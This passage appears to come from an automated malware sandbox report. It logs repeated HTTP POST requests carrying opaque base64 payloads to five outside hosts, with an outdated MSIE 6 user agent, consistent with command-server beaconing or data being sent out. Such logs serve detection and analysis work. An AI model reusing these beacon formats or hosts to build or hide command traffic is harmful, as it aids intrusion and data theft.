4d 6a 7a 42 47 2f 76 41 30 30 6a 4e 50 7a 41 50 6a 31 38 44 57 72 74 77 63 73 58 4c 66 67 62 44 6d 70 77 70 61 2f 67 54 4c 48 39 6d 4c 4f 39 2b 66 71 49 50 68 47 6b 34 58 47 78 53 68 79 30 38 67 57 6c 62 4e 58 2b 6c 35 30 36 46 51 4c 67 51 42 56 54 79 6a 63 6e 53 32 47 35 38 32 5a 6c 31 2b 4e 6d 65 49 4f 35 43 37 6b 31 57 76 45 6f 68 44 6f 5a 2b 53 39 46 44 77 69 2f 39 42 51 6f 68 65 36 75 71 78 38 49 45 41 58 6e 67 78 63 68 36 49 62 73 6e 35 54 67 37 55 30 6b 32 61 6b 70 43 64 70 6c 73 6e 61 4a 55 47 61 37 47 69 4a 6a 38 33 7a 79 65 6a 49 57 6e 4f 75 6a 79 4b 72 6b 64 4c 69 78 4d 79 58 47 33 42 6e 6f 34 56 76 75 6b 47 32 30 41 42 75 32 57 75 57 4e 6a 30 73 35 6d 58 76 76 74 4e 79 4f 61 6b 2f 31 6b 41 36 36 7a 59 42 76 74 4b 49 4d 62 31 4f 59 7a 2b 51 78 63 4b 75 6c 50 57 4d 6c 39 69 61 64 70 6a 64 6e 6c 4e 70 72 6e 47 4f 4c 63 62 63 76 53 79 49 46 72 41 79 75 43 72 48 52 77 66 44 4d 55 53 52 54 6d 68 42 49 6a 37 41 76 33 2f 4a 32 68 56 4b 6a 77 52 62 59 6f 62 46 46 7a 46 55 77 46 52 4e 41 4f 50 79 45 4d 67 46 67 37 58 53 74 77 49 6e 51 66 46 38 4f 61 76 30 57 68 4f 55 32 72 71 52 4f 51 30 4f 64 4a Data Ascii: SK1LS2J3TIyNnxFR1Q90fOUyIkzyLup/tvtUAXceY/JHlFaJkF/N/g4/pFN+3ELQdgmQbIS3nNFViB0fQj6dcgNa+efbRmduraVXizgP3I6NBot2kUspgcKiVMHww++sP91tItVgacLqDkDuFY5RRWN/Dye2yYDZYtvi6IZnRaCUsTmIB9nKpzqR1D5YfmNEIAcn+HEXgCfkMjzBG/vA00jNPzAPj18DWrtwcsXLfgbDmpwpa/gTLH9mLO9+fqIPhGk4XGxShy08gWlbNX+l506FQLgQBVTyjcnS2G582Zl1+NmeIO5C7k1WvEohDoZ+S9FDwi/9BQohe6uqx8IEAXngxch6Ibsn5Tg7U0k2akpCdplsnaJUGa7GiJj83zyejIWnOujyKrkdLixMyXG3Bno4VvukG20ABu2WuWNj0s5mXvvtNyOak/1kA66zYBvtKIMb1OYz+QxcKulPWMl9iadpjdnlNprnGOLcbcvSyIFrAyuCrHRwfDMUSRTmhBIj7Av3/J2hVKjwRbYobFFzFUwFRNAOPyEMgFg7XStwInQfF8Oav0WhOU2rqROQ0OdJ
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 6f 58 47 59 65 59 70 49 56 6f 77 67 55 6c 50 46 37 5a 34 78 30 30 32 6d 68 7a 49 36 2b 7a 54 6b 58 6b 75 47 4a 6d 48 4f 66 78 42 4c 46 45 41 66 53 49 4f 61 69 35 4b 75 31 34 2f 59 69 54 4e 72 44 38 36 4b 76 4c 4b 7a 2f 74 30 30 35 37 63 43 72 2b 79 49 71 35 65 30 33 77 6a 49 75 67 6b 4e 6a 76 65 61 6a 4a 34 65 64 66 67 55 70 50 36 4b 5a 6f 51 34 6d 2f 76 6e 64 77 51 47 74 58 46 53 37 41 41 73 48 47 70 67 69 68 37 4a 75 4e 77 76 33 68 6e 5a 41 33 72 2b 71 41 45 45 5a 58 38 47 52 4a 4e 70 34 68 70 63 65 34 35 69 50 5a 7a 45 66 41 43 39 66 69 67 5a 36 52 78 36 57 34 53 6f 6b 6d 5a 62 67 5a 6f 67 39 58 79 7a 39 68 2f 78 37 4c 63 39 35 42 5a 74 6f 67 52 44 2f 35 5a 44 49 54 69 49 45 42 70 77 49 4e 58 69 43 4f 72 2f 39 41 73 52 64 43 42 66 71 37 6f 72 6f 75 64 77 6d 2b 6b 47 39 4a 2b 75 62 76 4e 30 4e 36 78 68 42 59 6c 47 56 6a 53 2b 54 51 6e 37 74 54 4e 51 46 4c 33 48 6a 7a 4e 31 73 35 43 62 6d 6e 75 37 69 49 4a 70 62 66 5a 74 64 31 74 53 38 76 47 68 47 73 38 4c 79 76 42 52 64 7a 47 6b 58 73 34 64 44 70 2f 77 56 42 75 36 79 42 48 6f 57 44 53 48 7a 39 64 6a 5a 38 50 35 56 35 53 55 53 58 6e 70 71 54 72 4f 2b 76 43 72 69 77 59 4a 50 65 54 70 79 73 62 47 51 7a 71 73 6d 4e 6f 6a 57 32 6c 50 79 6c 55 54 46 7a 57 6d 34 48 59 34 56 55 38 4c 49 55 62 78 47 6f 61 75 53 71 74 55 46 4f 34 2f 77 46 72 46 2f 38 4d 51 53 66 4c 30 73 64 69 74 65 38 74 48 4a 6c 7a 6e 72 4a 4d 6d 76 78 31 70 78 6f 63 49 59 55 4d 46 2f 46 70 35 5a 56 57 4c 49 6e 55 46 52 30 52 4f 47 54 67 4a 39 65 67 54 44 4c 4b 79 42 77 75 4e 31 68 79 73 34 79 75 7a 73 55 6b 4b 70 6b 4a 57 4f 6b 2b 4b 51 75 68 4a 44 76 54 32 6d 6a 59 36 38 61 66 41 41 32 50 53 74 6b 43 70 4e 55 6e 67 57 51 57 7a 6f 6d 6e 4c 6a 37 4a 62 58 6d 7a 53 4f 30 73 71 59 4f 5a 6b 35 68 75 30 42 41 3d 3d Data Ascii: oXGYeYpIVowgUlPF7Z4x002mhzI6+zTkXkuGJmHOfxBLFEAfSIOai5Ku14/YiTNrD86KvLKz/t0057cCr+yIq5e03wjIugkNjveajJ4edfgUpP6KZoQ4m/vndwQGtXFS7AAsHGpgih7JuNwv3hnZA3r+qAEEZX8GRJNp4hpce45iPZzEfAC9figZ6Rx6W4SokmZbgZog9Xyz9h/x7Lc95BZtogRD/5ZDITiIEBpwINXiCOr/9AsRdCBfq7oroudwm+kG9J+ubvN0N6xhBYlGVjS+TQn7tTNQFL3HjzN1s5Cbmnu7iIJpbfZtd1tS8vGhGs8LyvBRdzGkXs4dDp/wVBu6yBHoWDSHz9djZ8P5V5SUSXnpqTrO+vCriwYJPeTpysbGQzqsmNojW2lPylUTFzWm4HY4VU8LIUbxGoauSqtUFO4/wFrF/8MQSfL0sdite8tHJlznrJMmvx1pxocIYUMF/Fp5ZVWLInUFR0ROGTgJ9egTDLKyBwuN1hys4yuzsUkKpkJWOk+KQuhJDvT2mjY68afAA2PStkCpNUngWQWzomnLj7JbXmzSO0sqYOZk5hu0BA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 50 33 78 69 4c 4b 44 47 55 34 77 39 73 36 43 44 38 38 6c 7a 49 39 50 4b 2f 39 67 49 75 76 48 48 31 4a 64 48 51 4c 67 45 50 77 4d 51 62 51 57 74 76 36 77 4a 7a 51 57 73 56 32 52 39 42 72 41 33 50 44 44 4f 66 68 64 38 38 4b 64 49 57 38 50 5a 2f 4d 32 53 34 37 37 51 62 4d 59 30 4a 68 65 6a 74 69 79 43 71 68 4c 48 35 43 58 34 39 31 62 63 49 31 79 30 42 67 42 73 63 6c 47 54 54 62 34 6a 53 2b 47 41 39 67 74 48 73 63 32 64 44 30 2f 51 36 2b 42 63 44 76 46 51 51 79 52 38 45 58 34 6a 56 47 2f 46 53 57 4d 65 4c 54 47 54 6b 61 66 6d 65 63 34 58 47 70 38 63 50 44 56 50 57 55 43 44 65 6c 39 34 50 42 75 37 32 4a 57 43 64 45 49 39 4d 49 32 73 59 5a 58 6b 69 4d 79 4b 43 55 36 32 49 4a 4c 4b 36 4b 50 78 65 62 6f 41 67 49 56 67 35 34 77 32 6e 68 6b 39 44 6b 4f 44 72 4b 34 76 48 53 4c 37 2f 5a 78 72 70 68 50 73 47 61 31 4d 55 55 52 74 62 37 6e 38 58 47 78 4e 34 52 65 69 45 58 2b 6b 4b 41 7a 58 32 6a 65 56 62 4e 6c 31 67 61 5a 69 46 77 53 41 79 78 69 32 4d 51 7a 61 6f 4d 78 42 4b 47 55 35 32 33 30 4a 59 36 42 30 66 4d 79 61 65 5a 61 6d 34 56 44 71 34 37 73 2b 75 43 4c 64 4d 45 51 38 37 32 4c 4a 6c 33 31 4b 6a 75 6a 71 46 65 56 73 5a 41 6d 36 65 42 5a 31 6f 55 64 75 30 6c 76 6e 52 53 4d 31 36 67 4e 4f 37 48 4b 55 32 32 72 32 71 55 6a 78 35 6f 4a 34 76 4a 74 32 51 49 6c 6b 49 68 6e 50 46 39 56 77 53 61 64 68 55 2b 2f 35 51 39 32 50 69 5a 35 37 63 52 53 65 75 71 6e 66 53 31 33 45 59 36 74 59 46 46 4b 76 46 58 6e 49 6b 67 35 31 51 36 38 68 39 35 6f 57 7a 7a 48 6a 4f 48 4f 4c 2f 33 6e 4a 38 5a 36 62 34 56 52 43 33 63 4a 57 54 72 32 7a 48 74 58 47 72 6b 42 37 77 4e 78 4d 34 7a 38 35 69 30 32 74 44 63 54 66 64 43 56 53 6e 4f 65 54 43 2f 65 6f 57 79 77 3d Data Ascii: P3xiLKDGU4w9s6CD88lzI9PK/9gIuvHH1JdHQLgEPwMQbQWtv6wJzQWsV2R9BrA3PDDOfhd88KdIW8PZ/M2S477QbMY0JhejtiyCqhLH5CX491bcI1y0BgBsclGTTb4jS+GA9gtHsc2dD0/Q6+BcDvFQQyR8EX4jVG/FSWMeLTGTkafmec4XGp8cPDVPWUCDel94PBu72JWCdEI9MI2sYZXkiMyKCU62IJLK6KPxeboAgIVg54w2nhk9DkODrK4vHSL7/ZxrphPsGa1MUURtb7n8XGxN4ReiEX+kKAzX2jeVbNl1gaZiFwSAyxi2MQzaoMxBKGU5230JY6B0fMyaeZam4VDq47s+uCLdMEQ872LJl31KjujqFeVsZAm6eBZ1oUdu0lvnRSM16gNO7HKU22r2qUjx5oJ4vJt2QIlkIhnPF9VwSadhU+/5Q92PiZ57cRSeuqnfS13EY6tYFFKvFXnIkg51Q68h95oWzzHjOHOL/3nJ8Z6b4VRC3cJWTr2zHtXGrkB7wNxM4z85i02tDcTfdCVSnOeTC/eoWyw=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 50 33 78 69 4c 4b 44 47 55 34 77 39 73 36 43 44 38 38 6c 7a 49 39 50 4b 2f 39 67 49 75 76 48 48 31 4a 64 48 51 4c 67 45 50 77 4d 51 62 51 57 74 76 36 77 4a 7a 51 57 73 56 32 52 39 42 72 41 33 50 44 44 4f 66 68 64 38 38 4b 64 49 57 38 50 5a 2f 4d 32 53 34 37 37 51 62 4d 59 30 4a 68 65 6a 74 69 79 43 71 68 4c 48 35 43 58 34 39 31 62 63 49 31 79 30 42 67 42 73 63 6c 47 54 54 62 34 6a 53 2b 47 41 39 67 74 48 73 63 32 64 44 30 2f 51 36 2b 42 63 44 76 46 51 51 79 52 38 45 58 34 6a 56 47 2f 46 53 57 4d 65 4c 54 47 54 6b 61 66 6d 65 63 34 58 47 70 38 63 50 44 56 50 57 55 43 44 65 6c 39 34 50 42 75 37 32 4a 57 43 64 45 49 39 4d 49 32 73 59 5a 58 6b 69 4d 79 4b 43 55 36 32 49 4a 4c 4b 36 4b 50 78 65 62 6f 41 67 49 56 67 35 34 77 32 6e 68 6b 39 44 6b 4f 44 72 4b 34 76 48 53 4c 37 2f 5a 78 72 70 68 50 73 47 61 31 4d 55 55 52 74 62 37 6e 38 58 47 78 4e 34 52 65 69 45 58 2b 6b 4b 41 7a 58 32 6a 65 56 62 4e 6c 31 67 61 5a 69 46 77 53 41 79 78 69 32 4d 51 7a 61 6f 4d 78 42 4b 47 55 35 32 33 30 4a 59 36 42 30 66 4d 79 61 65 5a 61 6d 34 56 44 71 34 37 73 2b 75 43 4c 64 4d 45 51 38 37 32 4c 4a 6c 33 31 4b 6a 75 6a 71 46 65 56 73 5a 41 6d 36 65 42 5a 31 6f 55 64 75 30 6c 76 6e 52 53 4d 31 36 67 4e 4f 37 48 4b 55 32 32 72 32 71 55 6a 78 35 6f 4a 34 76 4a 74 32 51 49 6c 6b 49 68 6e 50 46 39 56 77 53 61 64 68 55 2b 2f 35 51 39 32 50 69 5a 35 37 63 52 53 65 75 71 6e 66 53 31 33 45 59 36 74 59 46 46 4b 76 46 58 6e 49 6b 67 35 31 51 36 38 68 39 35 6f 57 7a 7a 48 6a 4f 48 4f 4c 2f 33 6e 4a 38 5a 36 62 34 56 52 43 33 63 4a 57 54 72 32 7a 48 74 58 47 72 6b 42 37 77 4e 78 4d 34 7a 38 35 69 30 32 74 44 63 54 66 64 43 56 53 6e 4f 65 54 43 2f 65 6f 57 79 77 3d Data Ascii: P3xiLKDGU4w9s6CD88lzI9PK/9gIuvHH1JdHQLgEPwMQbQWtv6wJzQWsV2R9BrA3PDDOfhd88KdIW8PZ/M2S477QbMY0JhejtiyCqhLH5CX491bcI1y0BgBsclGTTb4jS+GA9gtHsc2dD0/Q6+BcDvFQQyR8EX4jVG/FSWMeLTGTkafmec4XGp8cPDVPWUCDel94PBu72JWCdEI9MI2sYZXkiMyKCU62IJLK6KPxeboAgIVg54w2nhk9DkODrK4vHSL7/ZxrphPsGa1MUURtb7n8XGxN4ReiEX+kKAzX2jeVbNl1gaZiFwSAyxi2MQzaoMxBKGU5230JY6B0fMyaeZam4VDq47s+uCLdMEQ872LJl31KjujqFeVsZAm6eBZ1oUdu0lvnRSM16gNO7HKU22r2qUjx5oJ4vJt2QIlkIhnPF9VwSadhU+/5Q92PiZ57cRSeuqnfS13EY6tYFFKvFXnIkg51Q68h95oWzzHjOHOL/3nJ8Z6b4VRC3cJWTr2zHtXGrkB7wNxM4z85i02tDcTfdCVSnOeTC/eoWyw=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 6a 70 64 68 72 32 6a 34 63 49 78 48 49 50 6e 43 4b 77 42 4e 6f 39 75 48 36 55 56 77 38 2b 6e 6d 48 48 70 44 4f 46 64 79 68 7a 62 45 4e 58 38 31 61 39 66 33 62 71 48 61 64 55 61 71 47 52 44 41 72 32 73 76 31 43 43 59 71 49 30 56 70 7a 4a 44 58 6f 66 45 49 69 4a 58 53 69 46 2f 31 64 74 55 6c 33 56 69 67 47 57 69 51 6c 6d 56 53 37 5a 6c 50 56 53 44 48 63 2b 33 49 41 48 4a 71 46 53 69 46 7a 58 73 75 73 75 71 47 30 6b 54 70 33 6f 2b 4d 77 61 37 76 78 4c 58 62 73 33 38 51 73 50 73 57 4f 4c 61 68 4b 65 6e 76 68 33 77 63 38 32 66 4d 6b 35 65 53 39 34 4a 4b 65 48 4e 6b 46 38 38 78 47 6e 2b 77 4b 54 46 62 57 2f 51 62 6b 52 6f 6d 41 65 57 79 61 68 57 4a 70 39 57 7a 72 59 4d 6f 65 44 34 48 73 4a 57 64 42 77 4c 48 78 74 6d 41 41 4b 44 41 50 64 30 4c 2f 58 70 2b 73 54 71 73 51 62 48 73 47 38 32 6d 75 73 57 75 66 45 6b 46 39 75 4b 4a 6f 51 71 50 4e 64 61 57 46 62 6a 35 65 42 32 78 56 79 41 2b 78 62 4d 6b 77 6f 32 35 4e 32 48 74 76 6d 33 4a 69 51 53 58 4a 71 38 2b 63 56 58 4a 42 74 79 69 51 44 30 55 77 61 64 4d 66 61 4e 71 6d 72 72 77 4f 56 43 72 70 63 39 36 71 36 58 33 72 41 37 37 70 39 48 4a 6d 67 6d 4f 50 6d 4a 5a 33 4a 42 38 49 58 45 43 58 62 39 72 4b 58 2f 55 2b 73 33 4b 4e 30 51 70 57 43 72 6d 4e 2b 39 5a 2b 35 78 65 4f 30 33 74 5a 77 49 79 70 51 74 6b 73 6a 75 4b 35 49 32 7a 58 49 55 6b 32 35 37 61 71 6a 6f 6d 4d 66 7a 49 4d 4d 37 79 4a 46 50 56 49 56 6d 63 4a 37 34 78 36 6e 4c 62 70 41 64 6f 53 41 6b 71 63 34 66 4b 63 68 51 53 65 49 39 62 68 4e 6c 72 36 4d 48 64 42 39 77 59 6d 49 61 7a 56 58 65 51 58 45 66 48 48 66 72 50 56 38 2f 48 75 72 4e 50 72 39 52 73 34 69 79 6c 6b 36 4b 34 36 6e 76 Data Ascii: jpdhr2j4cIxHIPnCKwBNo9uH6UVw8+nmHHpDOFdyhzbENX81a9f3bqHadUaqGRDAr2sv1CCYqI0VpzJDXofEIiJXSiF/1dtUl3VigGWiQlmVS7ZlPVSDHc+3IAHJqFSiFzXsusuqG0kTp3o+Mwa7vxLXbs38QsPsWOLahKenvh3wc82fMk5eS94JKeHNkF88xGn+wKTFbW/QbkRomAeWyahWJp9WzrYMoeD4HsJWdBwLHxtmAAKDAPd0L/Xp+sTqsQbHsG82musWufEkF9uKJoQqPNdaWFbj5eB2xVyA+xbMkwo25N2Htvm3JiQSXJq8+cVXJBtyiQD0UwadMfaNqmrrwOVCrpc96q6X3rA77p9HJmgmOPmJZ3JB8IXECXb9rKX/U+s3KN0QpWCrmN+9Z+5xeO03tZwIypQtksjuK5I2zXIUk257aqjomMfzIMM7yJFPVIVmcJ74x6nLbpAdoSAkqc4fKchQSeI9bhNlr6MHdB9wYmIazVXeQXEfHHfrPV8/HurNPr9Rs4iylk6K46nv
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 6a 70 64 68 72 32 6a 34 63 49 78 48 49 50 6e 43 4b 77 42 4e 6f 39 75 48 36 55 56 77 38 2b 6e 6d 48 48 70 44 4f 46 64 79 68 7a 62 45 4e 58 38 31 61 39 66 33 62 71 48 61 64 55 61 71 47 52 44 41 72 32 73 76 31 43 43 59 71 49 30 56 70 7a 4a 44 58 6f 66 45 49 69 4a 58 53 69 46 2f 31 64 74 55 6c 33 56 69 67 47 57 69 51 6c 6d 56 53 37 5a 6c 50 56 53 44 48 63 2b 33 49 41 48 4a 71 46 53 69 46 7a 58 73 75 73 75 71 47 30 6b 54 70 33 6f 2b 4d 77 61 37 76 78 4c 58 62 73 33 38 51 73 50 73 57 4f 4c 61 68 4b 65 6e 76 68 33 77 63 38 32 66 4d 6b 35 65 53 39 34 4a 4b 65 48 4e 6b 46 38 38 78 47 6e 2b 77 4b 54 46 62 57 2f 51 62 6b 52 6f 6d 41 65 57 79 61 68 57 4a 70 39 57 7a 72 59 4d 6f 65 44 34 48 73 4a 57 64 42 77 4c 48 78 74 6d 41 41 4b 44 41 50 64 30 4c 2f 58 70 2b 73 54 71 73 51 62 48 73 47 38 32 6d 75 73 57 75 66 45 6b 46 39 75 4b 4a 6f 51 71 50 4e 64 61 57 46 62 6a 35 65 42 32 78 56 79 41 2b 78 62 4d 6b 77 6f 32 35 4e 32 48 74 76 6d 33 4a 69 51 53 58 4a 71 38 2b 63 56 58 4a 42 74 79 69 51 44 30 55 77 61 64 4d 66 61 4e 71 6d 72 72 77 4f 56 43 72 70 63 39 36 71 36 58 33 72 41 37 37 70 39 48 4a 6d 67 6d 4f 50 6d 4a 5a 33 4a 42 38 49 58 45 43 58 62 39 72 4b 58 2f 55 2b 73 33 4b 4e 30 51 70 57 43 72 6d 4e 2b 39 5a 2b 35 78 65 4f 30 33 74 5a 77 49 79 70 51 74 6b 73 6a 75 4b 35 49 32 7a 58 49 55 6b 32 35 37 61 71 6a 6f 6d 4d 66 7a 49 4d 4d 37 79 4a 46 50 56 49 56 6d 63 4a 37 34 78 36 6e 4c 62 70 41 64 6f 53 41 6b 71 63 34 66 4b 63 68 51 53 65 49 39 62 68 4e 6c 72 36 4d 48 64 42 39 77 59 6d 49 61 7a 56 58 65 51 58 45 66 48 48 66 72 50 56 38 2f 48 75 72 4e 50 72 39 52 73 34 69 79 6c 6b 36 4b 34 36 6e 76 Data Ascii: jpdhr2j4cIxHIPnCKwBNo9uH6UVw8+nmHHpDOFdyhzbENX81a9f3bqHadUaqGRDAr2sv1CCYqI0VpzJDXofEIiJXSiF/1dtUl3VigGWiQlmVS7ZlPVSDHc+3IAHJqFSiFzXsusuqG0kTp3o+Mwa7vxLXbs38QsPsWOLahKenvh3wc82fMk5eS94JKeHNkF88xGn+wKTFbW/QbkRomAeWyahWJp9WzrYMoeD4HsJWdBwLHxtmAAKDAPd0L/Xp+sTqsQbHsG82musWufEkF9uKJoQqPNdaWFbj5eB2xVyA+xbMkwo25N2Htvm3JiQSXJq8+cVXJBtyiQD0UwadMfaNqmrrwOVCrpc96q6X3rA77p9HJmgmOPmJZ3JB8IXECXb9rKX/U+s3KN0QpWCrmN+9Z+5xeO03tZwIypQtksjuK5I2zXIUk257aqjomMfzIMM7yJFPVIVmcJ74x6nLbpAdoSAkqc4fKchQSeI9bhNlr6MHdB9wYmIazVXeQXEfHHfrPV8/HurNPr9Rs4iylk6K46nv
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.rs-ag.comCache-Control: no-cacheData Raw: 58 62 36 78 66 7a 4b 38 64 34 77 42 55 6e 48 68 5a 57 31 68 64 44 56 63 37 62 49 43 48 42 6b 5a 68 71 30 2b 2b 39 77 4d 51 7a 49 73 58 2f 6f 75 63 68 6e 6a 4a 7a 73 62 45 4b 4a 52 6e 68 34 31 4b 5a 45 58 76 6a 4c 39 58 33 55 46 59 2f 72 71 34 49 73 62 2f 2b 65 35 43 44 58 78 7a 52 79 77 35 43 56 6e 4c 66 52 32 78 48 7a 33 78 69 4d 55 4a 59 52 7a 57 6f 51 38 2f 50 48 48 48 7a 6f 6b 47 72 71 5a 71 72 36 4f 39 46 5a 70 7a 37 70 4d 5a 30 37 68 50 6b 71 6a 5a 39 74 67 31 6a 5a 31 6a 6c 50 33 68 72 49 45 78 39 37 6c 6b 6d 34 51 73 63 62 4c 36 6a 35 79 6f 6b 76 6f 48 4f 53 6c 34 53 6e 6e 31 37 65 54 4e 67 6b 62 41 6a 37 4b 51 36 50 37 55 49 4d 65 78 62 38 6f 56 5a 50 4e 73 69 39 4b 53 6e 37 47 57 53 2f 61 65 78 37 55 57 41 31 35 54 6f 4e 73 35 6f 78 39 6a 4e 70 57 73 54 70 73 2b 4d 32 57 54 38 48 37 35 74 51 49 45 47 76 34 4b 65 47 72 52 51 57 74 4a 6d 59 4c 45 46 47 4c 6d 4c 51 6b 63 71 65 5a 39 6f 74 51 72 6f 70 65 38 75 61 63 4b 63 63 4b 61 63 4a 4e 52 6d 4e 2f 77 55 32 2b 71 2b 66 41 43 57 68 63 59 72 4d 73 72 50 31 68 51 47 52 57 34 55 35 46 39 7a 46 4f 65 48 69 74 66 4d 65 79 75 57 59 64 55 74 53 41 50 52 30 66 41 7a 6d 4c 6b 39 76 38 59 37 56 73 75 4c 71 51 61 6b 38 6d 51 79 59 43 4e 6f 76 50 39 39 59 6f 5a 70 64 33 51 68 67 55 46 61 78 51 37 45 43 7a 53 76 4f 44 5a 71 30 30 76 7a 43 2b 59 6f 45 67 67 4d 52 74 4e 46 4d 4b 38 6d 52 43 46 33 30 70 58 70 75 37 37 4a 6a 74 33 75 74 6b 43 39 56 34 6e 68 74 43 47 4f 49 31 2b 41 62 65 4e 41 41 4f 6f 55 49 69 54 32 6f 39 56 43 75 6f 4a 67 5a 70 67 4e 66 39 7a 51 48 49 31 2b 35 64 6c 63 58 71 57 32 6f 73 6c 67 59 30 54 44 2f 6a 6b 50 4a 38 78 68 73 35 63 74 34 74 49 69 45 48 36 37 4a 74 6e 36 49 56 7a 30 63 59 59 52 78 6a Data Ascii: Xb6xfzK8d4wBUnHhZW1hdDVc7bICHBkZhq0++9wMQzIsX/ouchnjJzsbEKJRnh41KZEXvjL9X3UFY/rq4Isb/+e5CDXxzRyw5CVnLfR2xHz3xiMUJYRzWoQ8/PHHHzokGrqZqr6O9FZpz7pMZ07hPkqjZ9tg1jZ1jlP3hrIEx97lkm4QscbL6j5yokvoHOSl4Snn17eTNgkbAj7KQ6P7UIMexb8oVZPNsi9KSn7GWS/aex7UWA15ToNs5ox9jNpWsTps+M2WT8H75tQIEGv4KeGrRQWtJmYLEFGLmLQkcqeZ9otQrope8uacKccKacJNRmN/wU2+q+fACWhcYrMsrP1hQGRW4U5F9zFOeHitfMeyuWYdUtSAPR0fAzmLk9v8Y7VsuLqQak8mQyYCNovP99YoZpd3QhgUFaxQ7ECzSvODZq00vzC+YoEggMRtNFMK8mRCF30pXpu77Jjt3utkC9V4nhtCGOI1+AbeNAAOoUIiT2o9VCuoJgZpgNf9zQHI1+5dlcXqW2oslgY0TD/jkPJ8xhs5ct4tIiEH67Jtn6IVz0cYYRxj
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 54 6e 74 7a 6e 75 61 37 65 49 78 53 30 78 6c 67 67 53 4c 6b 30 67 6e 65 32 69 72 47 4a 2f 38 5a 65 75 36 65 45 6d 42 4c 73 49 6a 6c 77 62 6f 66 4e 2f 49 58 44 77 64 6d 4c 68 38 41 67 6c 62 59 77 34 56 6f 5a 4e 77 70 37 50 79 33 4b 51 6e 64 5a 2f 6a 78 37 4b 30 49 72 32 65 4c 4d 67 75 47 4a 52 57 38 47 51 4e 4f 48 76 6e 6f 55 53 4c 2f 39 6b 5a 59 35 77 4c 44 56 38 73 54 34 57 43 6d 52 6f 42 2f 4c 41 6a 75 55 77 63 4d 57 2f 2f 64 4d 54 46 43 72 6b 4d 4d 66 53 6b 36 31 58 72 54 46 4d 70 47 75 44 62 48 42 7a 32 2b 4d 6b 77 33 62 72 70 65 30 45 6e 76 58 72 44 30 51 52 4f 6f 51 67 45 4f 75 4a 2b 49 6c 30 39 31 50 43 44 35 35 62 33 68 44 5a 77 67 37 78 42 53 36 44 58 62 31 69 37 62 6d 4e 5a 57 77 38 4c 34 4d 58 52 4f 76 50 49 5a 6e 49 6c 2b 54 78 63 4e 4b 72 36 47 39 52 2b 66 53 66 2f 56 4c 58 53 50 42 34 43 59 62 73 30 4c 4f 58 39 33 55 78 6f 71 35 73 4a 30 5a 6b 7a 34 42 64 48 33 72 53 35 61 77 6d 4b 52 70 52 71 67 50 64 52 4b 4a 42 4c 4d 62 75 37 39 46 4c 6f 53 59 5a 58 56 6b 73 64 65 36 68 39 55 44 76 6f 75 34 52 45 41 61 78 6d 34 74 71 4a 77 38 61 69 6e 46 4b 76 62 42 46 48 77 48 6e 4b 48 44 4e 4c 46 65 45 31 6c 52 38 4c 65 39 78 45 79 44 49 66 58 6c 43 66 66 56 32 31 48 6d 54 5a 4d 52 6d 70 4f 62 71 74 64 79 4f 68 35 77 48 76 54 47 6d 41 61 49 5a 37 58 4a 54 51 57 62 66 42 6d 2f 56 70 76 74 6e 49 59 4e 59 43 73 59 66 41 79 63 41 76 54 70 50 54 31 56 39 2b 74 77 6c 41 4a 37 34 4d 59 54 75 2f 4c 31 43 43 6e 36 4f 68 73 57 36 48 65 45 53 32 45 64 72 4f 75 32 66 50 4d 76 36 49 2f 52 46 45 69 47 65 35 66 4e 75 7a 6f 75 47 6e 33 6f 39 44 65 79 35 45 6a 43 31 6b 67 57 77 75 42 2b 51 79 2f 75 74 2b 53 7a 6a 36 38 55 6b 5a 45 Data Ascii: Tntznua7eIxS0xlggSLk0gne2irGJ/8Zeu6eEmBLsIjlwbofN/IXDwdmLh8AglbYw4VoZNwp7Py3KQndZ/jx7K0Ir2eLMguGJRW8GQNOHvnoUSL/9kZY5wLDV8sT4WCmRoB/LAjuUwcMW//dMTFCrkMMfSk61XrTFMpGuDbHBz2+Mkw3brpe0EnvXrD0QROoQgEOuJ+Il091PCD55b3hDZwg7xBS6DXb1i7bmNZWw8L4MXROvPIZnIl+TxcNKr6G9R+fSf/VLXSPB4CYbs0LOX93Uxoq5sJ0Zkz4BdH3rS5awmKRpRqgPdRKJBLMbu79FLoSYZXVksde6h9UDvou4REAaxm4tqJw8ainFKvbBFHwHnKHDNLFeE1lR8Le9xEyDIfXlCffV21HmTZMRmpObqtdyOh5wHvTGmAaIZ7XJTQWbfBm/VpvtnIYNYCsYfAycAvTpPT1V9+twlAJ74MYTu/L1CCn6OhsW6HeES2EdrOu2fPMv6I/RFEiGe5fNuzouGn3o9Dey5EjC1kgWwuB+Qy/ut+Szj68UkZE
